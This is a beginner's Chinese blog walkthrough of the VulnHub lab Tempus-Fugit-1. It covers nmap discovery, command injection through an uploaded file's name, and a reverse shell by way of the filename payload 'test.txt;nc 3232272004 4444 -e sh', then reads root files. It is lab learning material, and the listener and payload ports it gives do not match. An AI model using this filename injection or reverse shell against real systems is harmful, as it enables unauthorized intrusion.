当前位置: 代码迷 >> 综合 >> vulnhub-Tempus-Fugit-1
  详细解决方案

vulnhub-Tempus-Fugit-1

热度:88   发布时间:2023-09-05 19:26:07.0

前言:作为一个小白,从vulnhub上下载一些靶机,学习渗透测试,将知识记录在博客中,知识仅供学习。靶机是Tempus-Fugit-1,下载链接:https://www.vulnhub.com/entry/tempus-fugit-1,346/

正文:

目标机:192.168.142.140

kali:192.168.142.132

1.首先主机发现:nmap -sP 192.168.142.0/24

vulnhub-Tempus-Fugit-1

确认目标主机ip为192.168.142.140,接下来进行详细扫描,发现80端口

vulnhub-Tempus-Fugit-1

2.上浏览器看看,查看页面源码,翻翻网站,发现一个upload页面,可以拿shell啊

vulnhub-Tempus-Fugit-1

上传一个正常文件(test.txt)看看什么样子,内容为test,会回显,会不会存在xss,当然,没必要,拿到shell才是重点:

vulnhub-Tempus-Fugit-1

直接上一句话木马看看,文件名shell.php,不做任何修改,得到了这么个东西:

vulnhub-Tempus-Fugit-1

于是我进行了文件上传绕过操作,修改MIME类型,看看有没有文件解析漏洞等等,然而并没有什么作用,于是百度了一下,找到了一位老哥出的教程,文章连接:https://blog.csdn.net/id_null/article/details/102528917,第一次发现原来文件上传的地方居然还会有命令执行漏洞。修改文件名为test.txt;ls,查看结果:

vulnhub-Tempus-Fugit-1

3.接下里就可以查看路径、源码,获取shell了,linux反弹shell的方法很多,可以用bash,也可以使用python,也可以使用nc(前提是靶机安装了nc),本打算用bash的,但是文件名限制了“/”,所以借用那位大佬的方法,采用nc反弹:test.txt;nc 3232272004 4444 -e sh,kali开启监听:nc -lvp 1234。

vulnhub-Tempus-Fugit-1

vulnhub-Tempus-Fugit-1

反弹成功,Python -c ”import pty;pty.spawn('/bin/bash');"

vulnhub-Tempus-Fugit-1

vulnhub-Tempus-Fugit-1

输入id,发现是root权限,嘿嘿嘿,ls /root,cat /root/message.txt,emmmm。

vulnhub-Tempus-Fugit-1

后来就不会了,全是按照那位大佬的教程来。就写到这吧